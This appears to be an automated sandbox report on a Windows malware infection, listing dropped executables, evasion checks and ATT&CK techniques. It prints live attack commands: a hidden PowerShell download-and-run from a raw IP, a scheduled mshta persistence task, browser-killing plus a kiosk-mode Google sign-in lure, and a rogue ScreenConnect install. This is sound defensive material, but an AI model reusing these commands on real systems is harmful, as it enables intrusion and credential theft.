  - - C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
      "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1572
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 500
      4⤵
      Program crash
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe
    "C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2744
- - C:\Users\Admin\AppData\Local\Temp\1089289001\5782e13f6e.exe
    "C:\Users\Admin\AppData\Local\Temp\1089289001\5782e13f6e.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2004
- - C:\Users\Admin\AppData\Local\Temp\1089290001\2b8d02974d.exe
    "C:\Users\Admin\AppData\Local\Temp\1089290001\2b8d02974d.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Modifies system certificate store
    PID:1784
- - C:\Users\Admin\AppData\Local\Temp\1089291001\fd81d29568.exe
    "C:\Users\Admin\AppData\Local\Temp\1089291001\fd81d29568.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3116
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4140
- - C:\Users\Admin\AppData\Local\Temp\1089292001\3e0505c684.exe
    "C:\Users\Admin\AppData\Local\Temp\1089292001\3e0505c684.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3708
- - C:\Users\Admin\AppData\Local\Temp\1089293001\1b80ca21fe.exe
    "C:\Users\Admin\AppData\Local\Temp\1089293001\1b80ca21fe.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2672
- - C:\Users\Admin\AppData\Local\Temp\1089294001\716ddbb44f.exe
    "C:\Users\Admin\AppData\Local\Temp\1089294001\716ddbb44f.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2500
- - C:\Users\Admin\AppData\Local\Temp\1089295001\c139e4b71c.exe
    "C:\Users\Admin\AppData\Local\Temp\1089295001\c139e4b71c.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:4068
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:3244
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:916
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:344
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:3180
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:3160
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SendNotifyMessage
        
        PID:1872
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.0.974074840\1297266081" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {920f7147-3833-4628-a0a4-71d94b31f979} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 1304 115cf958 gpu
        6⤵
        
        PID:2188
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.1.1085012910\911290864" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62e49650-7555-4268-8034-4d78d6226e7f} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 1504 d74b58 socket
        6⤵
        
        PID:2180
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.2.866159266\495560448" -childID 1 -isForBrowser -prefsHandle 2204 -prefMapHandle 2200 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d663414d-787f-44c5-bbbf-f26f59be95b1} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 2216 19f04a58 tab
        6⤵
        
        PID:3956
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.3.2109788058\1664269459" -childID 2 -isForBrowser -prefsHandle 2772 -prefMapHandle 2768 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ef77e4f-b096-4c68-96a6-f9377f9222a9} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 2784 d6f958 tab
        6⤵
        
        PID:3056
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.4.1639508946\1729018505" -childID 3 -isForBrowser -prefsHandle 3704 -prefMapHandle 3700 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {624a4419-d2ee-4b2c-9a2e-067b1d2153e9} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 3716 1edcbf58 tab
        6⤵
        
        PID:3132
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.5.868853210\482986861" -childID 4 -isForBrowser -prefsHandle 3824 -prefMapHandle 3828 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82b3669e-63d7-4307-9e35-06c789620853} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 3816 1f55cf58 tab
        6⤵
        
        PID:3680
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1872.6.436075440\561008601" -childID 5 -isForBrowser -prefsHandle 3996 -prefMapHandle 4000 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 804 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f964c14-16ff-4ff0-be88-c6973977807f} 1872 "\\.\pipe\gecko-crash-server-pipe.1872" 3988 1f55a858 tab
        6⤵
        
        PID:3456
- - C:\Users\Admin\AppData\Local\Temp\1089296001\cd7bf9405c.exe
    "C:\Users\Admin\AppData\Local\Temp\1089296001\cd7bf9405c.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:3120
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 4rRGFmaI72f /tr "mshta C:\Users\Admin\AppData\Local\Temp\XfV0IINzT.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      PID:968
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 4rRGFmaI72f /tr "mshta C:\Users\Admin\AppData\Local\Temp\XfV0IINzT.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3440
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\XfV0IINzT.hta
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:3416
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:3980
      - C:\Users\Admin\AppData\Local\Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE
        
        "C:\Users\Admin\AppData\Local\Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:784
- - C:\Users\Admin\AppData\Local\Temp\1089297001\d9b3cb7467.exe
    "C:\Users\Admin\AppData\Local\Temp\1089297001\d9b3cb7467.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    PID:3912
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4296
- - C:\Users\Admin\AppData\Local\Temp\1089298001\ae7650820a.exe
    "C:\Users\Admin\AppData\Local\Temp\1089298001\ae7650820a.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3436
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:4396

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1392
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 86FC0E5117DF6651A3DE8EA16C52C134 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1936
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID623.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259446432 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:596
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 24DB031047C19720B6CE421BC212F8A8
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1084
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F3A72156E91D9BDB4D0127C429D93822 M Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:2252

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1092

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003D0" "00000000000005E4"
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1724

C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=4c1c2002-a97f-4c37-803c-c5cb50aec162&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&c=prequest&c=&c=&c=&c=&c=&c=&c="
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1228
- C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "a4577e1f-49e7-4e62-bd1c-af5de57da05b" "User"
  2⤵
  - Executes dropped EXE
  PID:2432
- C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "0d0781cb-4444-4bcb-973b-9e5e2bd28140" "System"
  2⤵
  - Executes dropped EXE
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:1724

C:\Windows\system32\taskeng.exe
taskeng.exe {58647526-2BB0-4FBC-ADA9-B981778F2958} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
1⤵
PID:1656
- C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
  C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1296
- C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
  C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3776

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3232

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion